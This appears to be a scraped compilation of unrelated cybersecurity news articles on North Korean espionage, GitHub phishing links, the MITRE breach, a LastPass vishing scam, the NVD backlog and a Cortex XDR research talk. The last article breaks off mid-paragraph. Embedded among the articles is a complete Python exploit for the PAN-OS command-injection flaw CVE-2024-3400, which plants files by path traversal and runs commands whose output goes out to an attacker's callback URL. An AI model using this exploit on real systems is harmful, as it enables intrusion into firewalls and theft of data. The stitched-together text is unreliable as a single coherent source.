Lazarus, Kimsuky, and Andariel all got in on the action, stealing "important" data from firms responsible for defending their southern neighbors (from them).

Source: Steve Allen Travel Photography via Alamy Stock Photo

North Korea's premiere advanced persistent threats (APTs) have been quietly spying on South Korean defense contractors for at least a year and a half, infiltrating some 10 organizations.

South Korean police this week released the findings of an investigation that uncovered concurrent espionage campaigns carried out by Andariel (aka Onyx Sleet, Silent Chollima, Plutonium), Kimsuky (aka APT 43, Thallium, Velvet Chollima, Black Banshee), and the broader Lazarus Group. Law enforcement did not name the victim defense organizations nor provide details on the stolen data.

The announcement comes one day after North Korea conducted its first-ever drill simulating a nuclear counterattack.

**DPRK APTs Persist**

Few countries are so aware of cyber threats from foreign nation-states as South Korea, and few industries so aware as military and defense. And yet, Kim's best always seem to find a way.

"APT threats, particularly those driven by state-level actors, are notoriously difficult to fully deter," laments Mr. Ngoc Bui, cybersecurity expert at Menlo Security. "If an APT or actor is highly motivated, there are few barriers that can't eventually be overcome."

In November 2022, for instance, Lazarus targeted a contractor which was cyber aware enough to operate separate internal and external networks. However, the hackers took advantage of their negligence in managing the system connecting the two. First, the hackers breached and infected an external network server. While defenses were down for a network test, they tunneled through the network connection system and into the innards. They then began harvesting and exfiltrating "important data" from six employee computers.

In another case beginning around October 2022, Andariel obtained login information belonging to an employee of a company that performed remote IT maintenance for one of the defense contractors in question. Using the hijacked account, it infected the company's servers with malware and exfiltrated data relating to defense technologies.

Police also highlighted an incident that lasted from April to July 2023, in which Kimsuky exploited the groupware email server used by one defense firm's partner company. A vulnerability allowed the unauthorized attackers to download large files that'd been sent internally via email.

**Snuffing Out Lazarus**

Of use to authorities, Bui explains, is that "DPRK groups such as Lazarus frequently reuse not only their malware but also their network infrastructure, which can be both a vulnerability and a strength in their operations. Their OPSEC failures and reuse of infrastructure, combined with innovative tactics such as infiltrating companies, make them particularly intriguing to monitor."

The perpetrators behind each of the defense breaches were identified thanks to the malware they deployed post-compromise — including the Nukesped and Tiger remote access Trojans (RATs) — as well as their architecture and IP addresses. Notably, some of those IPs traced to Shenyang, China, and a 2014 attack against the Korea Hydro & Nuclear Power Co.

"North Korea's hacking attempts targeting defense technology are expected to continue," the Korean National Police Agency said in a statement. The agency recommends that defense companies and their partners use two-factor authentication and periodically change passwords associated with their accounts, cordon off internal from external networks, and block access to sensitive resources for unauthorized and unnecessary foreign IP addresses.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

North Korea APT Triumvirate Spied on South Korean Defense Industry For Years

An utterly innocuous feature in popular Git CDNs allows anyone to conceal malware behind brand names, without those brands being any the wiser.

Source: Image Source Limited via Alamy Stock Photo

Hackers are using unpublished GitHub and GitLab comments to generate phishing links that appear to come from legitimate open source software (OSS) projects.

The clever trick, first described by Sergei Frankoff of Open Analysis last month, allows anyone to impersonate any repository they wish without the owners of that repository knowing about it. And even if the owners do know about it, they can't do anything to stop it.

Case in point: Hackers have already abused this method to distribute the Redline Stealer Trojan, using links associated with Microsoft's GitHub-hosted repos "vcpkg" and "STL," according to McAfee. Frankoff independently discovered more cases involving the same loader used in that campaign, and Bleeping Computer found an additional affected repo, "httprouter."

According to Bleeping Computer, the issue affects both GitHub — a platform with more than 100 million registered users, and its closest competitor, GitLab, with more than 30 million users.

**Undetectable, Unstoppable, Believable Phishing Links**

This remarkable flaw in GitHub and GitLab lies in possibly the most mundane feature imaginable.

Developers will often leave suggestions or report bugs by leaving comments on an OSS project page. Sometimes, such a comment will involve a file: a document, a screenshot, or other media.

When a file is to be uploaded as part of a comment on GitHub's and GitLab's content delivery networks (CDNs), the comment is automatically assigned a URL. This URL is visibly associated with whatever project the comment pertains to. On GitLab, for example, a file uploaded with a comment earns a URL in the following format: https://gitlab.com/{project\_group\_name}/{repo\_name}/uploads/{file\_id}/{file\_name}.

What hackers have figured out is that this provides perfect cover for their malware. They can, for example, upload a malware loader for the RedLine Stealer to a Microsoft repo, and get a link in return. Though it houses malware, to any onlooker, it will appear to be a legitimate link to a real Microsoft repo file.

But that's not all.

If an attacker posts malware to a repo, you'd figure that the owner of that repo or GitHub would spot it and address it.

What they can do, then, is publish and then quickly delete the comment. The URL continues to work and the file remains uploaded to the site's CDN, nonetheless.

Or, even better: The attacker can simply not post the comment to begin with. On both GitHub and GitLab, a working link is automatically generated as soon as a file is added to a comment in progress.

Thanks to this banal quirk, an attacker can upload malware to any GitHub repo they wish, get a link back associated with that repo, and simply leave the comment unpublished. They can use it in phishing attacks for as long as they'd like, while the impersonated brand will have no idea that any such link was generated in the first place.

**Don't Trust Links**

Malicious URLs tied to legitimate repos lend credence to phishing attacks and, conversely, threaten to embarrass and undermine the credibility of the impersonated party.

What's worse: they have no recourse. According to Bleeping Computer, there is no setting that allows owners to manage files attached to their projects. They can temporarily disable comments, concomitantly preventing bug reporting and collaboration with the community, but there is no permanent fix.

Dark Reading reached out to both GitHub and GitLab to ask if they plan on fixing this issue and how. Here's how one responded:

"GitHub is committed to investigating reported security issues. We disabled user accounts and content in accordance with GitHub's Acceptable Use Policies, which prohibit posting content that directly supports unlawful active attack or malware campaigns that are causing technical harms," a GitHub representative said in an email. "We continue to invest in improving the security of GitHub and our users, and are looking into measures to better protect against this activity. We recommend users follow the instructions provided by maintainers on how to download the software that is officially released. Maintainers can utilize GitHub Releases or release processes within package and software registries to securely distribute software to their users."

Dark Reading will update the story if GitLab responds. In the meantime, users should tread lightly.

"Developers seeing the name of a trusted vendor in a GitHub URL will often trust that what they are clicking on is safe and legitimate," says Jason Soroko, senior vice president of product at Sectigo. "There has been a lot of commentary about how URL elements aren't understood by users, or don't have much to do with trust. However, this is a perfect example that URLs are important and have the capacity to create mistaken trust.

"Developers need to rethink their relationship to links associated with GitHub, or any other repository, and invest some time scrutinizing, just like they might with an email attachment."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Hackers Create Legit Phishing Links With Ghost GitHub, GitLab Comments

Palo Alto PAN-OS versions prior to 11.1.2-h3 command injection and arbitrary file creation exploit.

    # Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400# Software Link: -# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 #          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1# Tested on: Debian# CVE : CVE-2024-3400#!/usr/bin/env python3import systry:    import argparse    import requestsexcept ImportError:    print("Missing dependencies, either requests or argparse not installed")    sys.exit(2)# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/def check_vuln(target: str, file: str) -> bool:    ret = False        uri = "/ssl-vpn/hipreport.esp"        s = requests.Session()    r = ""        headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"    }         headers_noCookie = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0    }        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if r.status_code == 200:        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )        if r.status_code == 403:            print("Target vulnerable to CVE-2024-3400")            ret = True    else:        return ret    return ret        def cmdexec(target: str, callback_url: str, payload: str) -> bool:    ret = False    p = ""    if " " in payload:        p = payload.replace(" ", "${IFS)")    uri = "/ssl-vpn/hipreport.esp"    headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"            }     s = requests.Session()    r = ""        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if not "Success" in r.text:        return ret    else:        ret = True    return ret#Initilize parser for argumentsdef argparser(selection=None):    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )        subparser = parser.add_subparsers( help="Available modules", dest="module")        exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )    #---------------------------------------    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )    args = parser.parse_args(selection)    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])        if args.module == "exploit":            cmdexec(args.target, args.callbackurl, args.payload)    if args.module == "check":        check_vuln(args.target, args.filename)if __name__ == "__main__":    argparser()    print("Finished !")

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

The irony is lost on few, as a nation-state threat actor used eight MITRE techniques to breach MITRE itself — including exploiting the Ivanti bugs that attackers have been swarming on for months.

Source: Kristoffer Tripplaar via Alamy Stock Photo

Foreign nation-state hackers have used vulnerable Ivanti edge devices to gain three months' worth of "deep" access to one of MITRE Corp.'s unclassified networks.

MITRE, steward of the ubiquitous ATT&CK glossary of commonly known cyberattack techniques, previously went 15 years without a major incident. The streak snapped in January when, like so many other organizations, its Ivanti gateway devices were exploited.

The breach affected the Networked Experimentation, Research, and Virtualization Environment (NERVE), an unclassified, collaborative network the organization uses for research, development, and prototyping. The extent of the NERVE damage (pun intended) is currently being assessed.

Dark Reading reached out to MITRE to confirm the timeline and details of the attack. MITRE did not provide further clarification.

**MITRE's ATT&CK**

Stop me if you've heard this one before: In January, after an initial reconnaissance period, a threat actor exploited one of the company's virtual private networks (VPNs) through two Ivanti Connect Secure zero-day vulnerabilities (ATT&CK technique T1190, Exploit Public-Facing Applications).

According to a blog post from MITRE's Center for Threat-Informed Defense, the attackers bypassed the multifactor authentication (MFA) protecting the system with some session hijacking (MITRE ATT&CK T1563, Remote Service Session Hijacking).

They attempted to leverage several different remote services (T1021, Remote Services), including the Remote Desktop Protocol (RDP) and Secure Shell (SSH), to gain access to a valid administrator account (T1078, Valid Accounts). With it, they pivoted and "dug deep" into the network's VMware virtualization infrastructure.

There, they deployed Web shells (T1505.003, Server Software Component: Web Shell) for persistence, and backdoors to run commands (T1059, Command and Scripting Interpreter) and steal credentials, exfiltrating any stolen data to a command-and-control server (T1041, Exfiltration Over C2 Channel). To hide this activity, the group created its own virtual instances to run within the environment (T1564.006, Hide Artifacts: Run Virtual Instance).

**MITRE's Defense**

"The impact of this cyberattack should not be taken lightly," says Darren Guccione, CEO and co-founder at Keeper Security, highlighting "both the foreign ties of the attackers and the ability of the attackers to exploit two serious zero-day vulnerabilities in their quest to compromise MITRE’s NERVE, which could potentially expose sensitive research data and intellectual property."

He posits, "Nation-state actors often have strategic motivations behind their cyber operations, and the targeting of a prominent research institution like MITRE, that works on behalf of the US government, could be just one component of a larger effort."

Whatever its goals were, the hackers had ample time to carry them out. Though the compromise occurred in January, MITRE was only able to detect it in April, leaving a quarter-year gap in between.

"MITRE followed best practices, vendor instructions, and the government’s advice to upgrade, replace, and harden our Ivanti system," the organization wrote on Medium, "but we did not detect the lateral movement into our VMware infrastructure. At the time we believed we took all the necessary actions to mitigate the vulnerability, but these actions were clearly insufficient."

Editor's note: An earlier version of the story attributed the attacks to UNC5221. That attribution has not been made at this time.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

MITRE ATT&amp;CKED: InfoSec's Most Trusted Name Falls to Ivanti Bugs

Plus: New York’s legislature suffers a cyberattack, police disrupt a global phishing operation, and Apple removes encrypted messaging apps in China.

Looking for love? Be careful what you wish for.

A loose-knit community of con artists known as Yahoo Boys has begun using real-time face-swap technology to woo victims with romance scams. Using a variety of tools and techniques, the scammers use AI-powered apps to make themselves look like entirely different people on video calls. Just remember: If someone you’ve never met IRL is asking you for money, just say no.

Elsewhere in the world of harmful deepfakes, two major websites used for creating fake nude images of people are now blocked in the United Kingdom. The censorship, which appears to be self-imposed, comes just days after the UK proposed legislation that would ban nonconsensual, sexualized AI-generated images.

A Russian cybercriminal gang called Cyber Army of Russia Reborn appears to have been created with the help of Sandworm, the notorious Russian military hacking unit that has carried out devastating cyberattacks against Ukraine for years. The difference? Cyber Army of Russia Reborn is even more brazen, taking credit for attacks against critical infrastructure in Europe and the United States.

Change Healthcare’s ransomware saga entered a new chapter this week. A cybercriminal group called RansomHub claims to be selling highly sensitive patient information stolen from the company. The sale follows RansomHub’s claims that it possesses terabytes of data stolen in a February attack by another ransomware gang known as AlphV or Black Cat, which received a $22 million payment in March. Change Healthcare says it has spent $872 million response to the ransomware attack as of March 31.

The biggest global surveillance program carried out by the US may be about to get bigger. A two-year renewal of Section 702 of the Foreign Intelligence Surveillance Act, which technically expired on Friday, will soon go up for a vote by the US Senate after passing the House last week. Included in the legislation is a provision that would greatly expand the number of businesses that could be conscripted to spy on behalf of the US government, which critics have called the “Stasi provision.” One of the largest lobbying firms for Big Tech companies has opposed the provision over fears that tech industry workers could be forced to become informants.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

There’s a kernel of truth in every good fiction, which is why the very real Defense Advanced Research Projects Agency, or Darpa, is a constant go-to for shows like the _X-Files_ and games like _Metal Gear Solid_. It tends to pop up whenever a shadowy government agency is needed to reverse engineer a stolen alien artifact or construct a giant killer robot. A Darpa announcement this Thursday, however, sounds almost too much like the opening sequence of a Hideo Kojima game: With the help of the US Air Force Test Pilot School, the agency says an experimental aircraft known as the X-62 was successfully flown by artificial intelligence during a simulated dogfight against a human pilot in an F-16. “The potential for autonomous air-to-air combat has been imaginable for decades,” US Air Force secretary Frank Kendall says, “but the reality has remained a distant dream up until now.”

**New York State Legislature Hit by Cyberattack**

Details are scant as to the impact, but for at least several hours this week, hackers felled computer systems supporting the work of New York’s state legislature. While an attack on something called the Legislative Bill Drafting Commission isn’t quite as jaw-dropping as one against a power plant or a naval base, the LBDC is one of a dozen required stops that legislation in New York must make en route to becoming law. Bills can’t be introduced, amended, or reviewed by committee without it, much less get a vote. Luckily, the agency reports it was able to get back on its feet within a few hours using a “backup system.” An investigation of the attack is ongoing.

**Police Disrupt Global Phishing Operation**

An armada of law enforcement agencies arrested 37 suspects around the world last weekend in an operation targeting LabHost, reportedly one of the world’s largest phishing-as-a-service platforms. The investigation was spearheaded by the London Metropolitan Police in cooperation with Europol. Investigators uncovered a whopping 40,000 phishing domains being operated by as many as 10,000 users worldwide, Europol says. LabHost charged a monthly fee of $249. That cybercriminals have discovered the psychological benefits of just-below pricing is yet another sign of the growing popularity and sophistication of these markets.

**Apple Removes Encrypted Messaging Apps in China**

Encrypted messaging apps WhatsApp, Signal, and Telegram have gone the way of Winnie the Pooh. Citing “national security concerns,” China ordered Apple to delete “certain apps” from its Chinese App Store this week, the tech behemoth announced (while neglecting to specify which ones). Apple reportedly met with Chinese authorities to express concern over how banning the apps would impact its users but relented after being met with a stone wall. “We are obligated to follow the laws in the countries where we operate,” the company said, “even when we disagree.” Apple is heavily dependent on China’s workforce to manufacture its products, and sales in the region have topped $70 billion in recent years. That Apple has become beholden to the Chinese government because of this is no longer much of a secret.

AI-Controlled Fighter Jets Are Dogfighting With Human Pilots Now

CryptoChameleon attackers trade quantity for quality, dedicating time and resources to trick even the most diligent user into handing over their high-value credentials.

Source: II.studio via Shutterstock

An ongoing, highly sophisticated phishing campaign may have led some LastPass users to give up their all-important master passwords to hackers.

Password managers store all of a user's passwords — for Instagram, their job, and everything in between — in one place, protected by one "master" password. They unburden users from having to remember credentials for hundreds of accounts, and empower them to use more complicated, unique passwords for each account. On the other hand, if a threat actor gains access to the master password, they'll have keys to every single one of the accounts within.

Enter CryptoChameleon, a new, hands-on phishing kit of unparalleled realism. 

CryptoChameleon attacks tend not to be so widespread, but they're successful at a clip largely unseen across the cybercrime world, "which is why we typically see this targeting enterprises and other very high-value targets," explains David Richardson, vice president of threat intelligence at Lookout, which first identified and reported the latest campaign to LastPass. "A password vault is a natural extension, because you're obviously going to be able to monetize that at the end of the day."

Thus far, CryptoChameleon has managed to ensnare at least eight LastPass customers — but likely more — potentially exposing their master passwords.

**A Brief History of CryptoChameleon**

At first, CryptoChameleon looked like any other phishing kit.

Its operators had been around since late last year. In January, they began by targeting the cryptocurrency exchanges Coinbase and Binance. This initial targeting, plus its highly customizable toolset, earned it its name.

The picture changed in February, though, when they registered the domain fcc-okta\[.\]com, mimicking the Okta Single Sign On (SSO) page belonging to the US's Federal Communications Commission (FCC). "That suddenly made this rise from one of many consumer phishing kits that we see out there, to something that's going to pivot into targeting the enterprise, going after corporate credentials," Richardson recalls.

Richardson confirmed to Dark Reading that FCC employees were impacted, but could not say how many or whether the attacks led to any consequences for the agency. It was a sophisticated attack, he notes, that he expects to have worked even on trained employees.

The problem with CryptoChameleon wasn't just who it was targeting, but how well it did at defeating them. Its trick was thorough, patient, hands-on engagement with victims.

Consider, for example, the current campaign against LastPass.

It begins when a customer receives a call from an 888 number. A robo caller informs the customer that their account has been accessed from a new device. It then prompts them to press "1" to allow access, or "2" to block it. After pressing "2," they're told that they'll be receiving a call shortly from a customer service representative in order to "close the ticket."

Then the call comes in. Unbeknownst to the recipient, it's from a spoofed number. On the other end of the line is a live person, typically with an American accent. Other CryptoChameleon victims have also reported speaking with British agents.

"The agent has professional call center communication skills, and offers genuinely good advice," Richardson recalls from his many conversations with victims. "So, for example, they might say: 'I want you to write down this support phone number for me.' And they have victims write down the real support phone number for whoever they're impersonating. And then they give them a whole lecture: 'Only call us on this number.' I had a victim report that they actually said, 'For quality and training purposes, this call is being recorded.' They're using the full call script, everything that you can think of to make someone believe that they're really talking to this company right now."

This supposed support agent informs the user that they'll be sending an email shortly, allowing the user to reset access to their account. In fact, this is a malicious email containing a shortened URL, directing them to a phishing site.

The helpful support agent watches in real time as the user enters their master password into the copycat site. Then they use it to log into their account, and immediately change the primary phone number, email address, and master password, thereby locking the victim out for good.

All the while, Richardson says, "They don't realize it's a scam — none of the victims I talked to. One person said, 'I don't think I ever entered my master password in there.' \[I told them\] 'You spent 23 minutes on the phone with these guys. You probably did.'"

**The Damage**

LastPass shut down the suspicious domain used in the attack — help-lastpass\[.\]com — shortly after it went live. The attackers have been persistent, though, continuing their activity under a new IP address.

With visibility into the attackers' internal systems, Richardson was able to identify at least eight victims. He also offered evidence (which Dark Reading is keeping confidential) indicating that there may have been more than that.

When asked for further information, LastPass senior intelligence analyst Mike Kosak told Dark Reading, "We do not disclose details on the number of customers who are impacted by this type of campaign, but we support any customer who may be a victim of this and other scams. We encourage people to report potential phishing scams and other nefarious activity impersonating LastPass to us at \[email protected\]."

**Is There Any Defense?**

Because hands-on CryptoChameleon attackers talk their victims through any potential security barriers like multifactor authentication (MFA), defending against them begins with awareness.

"People need to be aware that attackers can spoof phone numbers — that just because an 800 or 888 number calls you, it doesn't mean that it's legitimate," Richardson says, adding that  "just because there's an American on the other end of the line also does not mean that it's legitimate."

In fact, he says, "Don't answer the phone from unknown callers. I know that's a sad reality of the world that we live in today."

Even with all the awareness and precautionary measures known to business users and consumers, though, a particularly sophisticated social engineering attack might still get through.

"One of the CryptoChameleon victims I talked to was a retired IT professional," Richardson recalls. "He said, 'I've gotten training my whole life to not fall for these kinds of attacks. Somehow I fell for it'."

LastPass has asked Dark Reading to remind customers of the following:

*   Ignore any unsolicited or unprompted incoming phone calls (automated or with a live individual) or texts claiming to be from LastPass related to a recent attempt to change your password and/or account information. These are part of an ongoing phishing campaign. 
    
*   If you do see this activity and are concerned you may have been compromised, contact the company at \[email protected\].
    
*   And finally, LastPass will never ask you for your password.
    

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Multiple LastPass Users Lose Master Passwords to Ultra-Convincing Scam

Given the state of the NVD and vulnerability management, we felt it was worth looking at the current state of the NVD, how we got to this point, what it means for security teams, and where we go from here.

Friday, April 19, 2024 08:00

The National Vulnerability Database is usually the single source of truth for all things related to security vulnerabilities.  

But now, they’re facing an uphill battle against a massive backlog of vulnerabilities, some of which are still waiting to be analyzed, and others that still have an inaccurate or altogether missing severity score.  

As of April 9, 5,799 CVEs that have been published since Feb. 15, 2024, remain unanalyzed. 

As the backlog piles up, it’s unclear how, or when, the NVD is going to get back to its regular cadence of processing, scoring and analyzing vulnerabilities that are submitted to the U.S. government repository. At its current pace, the NVD is analyzing about 2.9 percent of all published CVEs it's been sent, well behind its pace in previous years. If there were no new CVEs submitted today, it could take the NVD more than 91 days to empty that backlog and get caught up. 

Given the state of the NVD and vulnerability management, we felt it was worth looking at the current state of the NVD, how we got to this point, what it means for security teams, and where we go from here. 

**What is the NVD? **

The U.S.’s National Vulnerability Database provides the most comprehensive list of CVEs anywhere. This tracks security vulnerabilities in hardware and software and distributes that list to the public for anyone to use.  

This data enables organizations and large networks to automate vulnerability management, take appropriate security steps when a new vulnerability is discovered, important references and metrics that indicate how serious a particular vulnerability is.  

The U.S. National Institute of Standards and Technology (NIST) has managed the NVD since 2000, when it was started as the Internet Category of Attack toolkit. It eventually morphed into the NVD, which passed the 150,000-vulnerability mark in 2021.  

In addition to simply listing the CVEs that are regularly disclosed, the NVD scores vulnerabilities using the CVSS system, which often differ from the initial severity score that’s assigned by the researcher that discovers the vulnerability, or the company or organization behind the affected product or software. 

Since the creation of I-CAT, no other organization or private company has as comprehensive of a list of vulnerabilities as the NVD, nor do they offer it for free like NIST does.  

**Why is the backlog a problem? **

On the surface, it may seem like the fact that the NVD has been slow to analyze CVEs isn’t all that bad, considering security issues are still being disclosed and patched every day (think: Microsoft Patch Tuesday). 

However, the lack of a single source of CVEs augmented information is detrimental to administrators, security researchers and users, and security experts are warning that the issue needs to be addressed quickly, or an alternative needs to be adopted.  

With the NVD being a collection of all this information, it’s up to the individual vendors to responsibly disclose and release vulnerabilities discovered in their products, which puts the onus on administrators to track that information down. If someone who handles patch management for a network was relying on the NVD for their information, that list is likely outdated at this point, and instead, they need to visit each individual vendor to find out what vulnerabilities were recently disclosed in their products, and how large of a risk they present.  

On any given network, that could be dozens to even hundreds of vendors, and while massive companies like Apple and Microsoft have easy-to-access security and vulnerability information, smaller open-source projects may not have the same resources that administrators need.  

The NVD is also the most trusted source for severity scores. Their calculations are generally what most users see when they read a security advisory. But without their input, it’s on the researcher or vendor to assign a score, instead. Under that system, there is no guarantee that a company may not want to score their vulnerability higher so it does not seem as serious, while researchers may want to bump up the severity of the issue they find so they are credited with discovering a higher-severity issue.  

As Talos has discussed before, a CVSS score is not the only metric worth relying on when patching, but it does play a major role in how the public views vulnerabilities and whether they’re likely to be exploited in the wild. According to Talos’ 2023 Year in Review report, eight of the 10 most-exploited CVEs last year received a severity score of 9.3 or higher. Any sense of uncertainty around CVSS scores can leave administrators scratching their heads and without a “north star” for patch management. 

The recent xz Utility vulnerability that was luckily prevented before any attackers could exploit it still does not have a Common Weakness Enumeration (CWE) assigned to it as of April 10 because of the backlog. Had an exploit for this been used, defenders would be missing crucial context and information for defending against this backdoor. 

**How did this backlog develop? **

NIST has been relatively vague about why the agency has been slow to process new vulnerabilities. The first sign of trouble came in February, when NIST released a statement that a “growing backlog of vulnerabilities” had developed because of “an increase in software and, therefore, vulnerabilities, as well as a change in interagency support.” 

NIST’s budget was cut by about 12 percent after the recent package of funding bills passed by U.S. Congress, as well. 

The agency also said in February that additional NIST staff were being shifted around to address the backlog, and at the recent VulnCon and Annual CNA Summit, the NVD program director promised that NIST was developing a consortium to help address the issues with the NVD.  

The total number of vulnerabilities disclosed continues to increase every year, driven by larger amounts of software on the market and increased visibility into security concerns and research. Last year, there were 28,961 CVEs disclosed, according to the CVE Program, an increase of 15 percent from 2022. The last time there were fewer CVEs assigned in a year compared to the year prior was in 2016. 

**What are some potential solutions? **

NIST has continued to publicly support the NVD and says it's preparing to revitalize the database. But it’s unclear what short- or long-term solutions or alternatives exist. 

Jerry Gamblin, a principal threat detection and response engineer for Cisco Vulnerability Management, said there has yet to be a company or organization willing to take on the monstrous task of tracking and scoring \*every\* CVE, especially for free.  

Other vulnerability catalogs exist like the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog, but the KEV only lists vulnerabilities that have actively been exploited in the wild. 

In short — all the potential alternatives are imperfect. 

“We can get the data from anywhere, and AI data could even help, but people just need to decide,” Gamblin said. “Is there going to be just one source of data? And who is the source of truth for this data? Who owns this data?” 

A private company like MITRE could step up to create its own solution, but it’d likely want to charge for access to that database. Any non-profit organization who also wants to step up would also likely need a massive influx of money and manpower to address the sheer volume of CVEs that come in every day. 

And while NIST says the consortium is in the works, there’s no timetable for how long it could take for that to be established, and which private companies would be involved.  

For now, it’s best to stick to tried-and-true patching strategies that have worked for years. Software, like Cisco Vulnerability Management, which has not been affected by the NVD backlog, can also assist in automating the patching process and prioritizing which vulnerabilities to patch first.

What’s the deal with the massive backlog of vulnerabilities at the NVD?

It turns out that a powerful security solution can double as even more powerful malware, capable of granting comprehensive access over a targeted machine.

Source: Maurice Norbert via Alamy Stock Photo

A creative exploit of Palo Alto Networks' extended detection and response (XDR) software could have allowed attackers to puppet it like a malicious multitool.

In a briefing at Black Hat Asia this week, Shmuel Cohen, security researcher at SafeBreach, described how he not only reverse-engineered and cracked into the company's signature Cortex product but also weaponized it to deploy a reverse shell and ransomware.

All but one of the weaknesses associated with his exploit have since been mended by Palo Alto. Whether other, similar XDR solutions are vulnerable to a similar attack is as yet unclear.

**A Devil's Bargain in Cybersecurity**

There is an inescapable devil's bargain when it comes to using certain kinds of far-reaching security tools. In order for these platforms to do their jobs, they must be granted highly privileged carte blanche access over every nook and cranny in a system.

For instance, to perform real-time monitoring and threat detection across IT ecosystems, XDR demands the highest possible permissions, and access to very sensitive information. And, to boot, it can't be easily removed. It was this immense power wielded by these programs that inspired in Cohen a twisted idea.

"I thought to myself: Would it be possible to turn an EDR solution itself into malware?" Cohen tells Dark Reading. "I'd take all these things that the XDR has and use them against the user."

After picking a laboratory subject — Cortex — he began reverse-engineering its various components, trying to figure out how it defined what is and isn't malicious.

A lightbulb switched on when he discovered a series of plaintext files the program relied on more than most.

**How to Turn XDR Evil**

"But those rules are inside my computer," Cohen thought. "What would happen if I manually removed them?"

It turned out that Palo Alto had thought of this already. An anti-tampering mechanism prevented any user from touching those precious Lua files — except the mechanism had an Achilles' heel. It worked by protecting not each individual Lua file by name, but the folder that encapsulated them all. To reach the files he wanted, then, he wouldn't have to undo the anti-tampering mechanism, if he could just reorient the path used to reach them and bypass the mechanism altogether.

A simple shortcut probably wouldn't have sufficed, so he used a hard link: the computer's way of connecting a filename with the actual data stored on a hard drive. This allowed him to point his own new file to the same location on the drive as the Lua files.

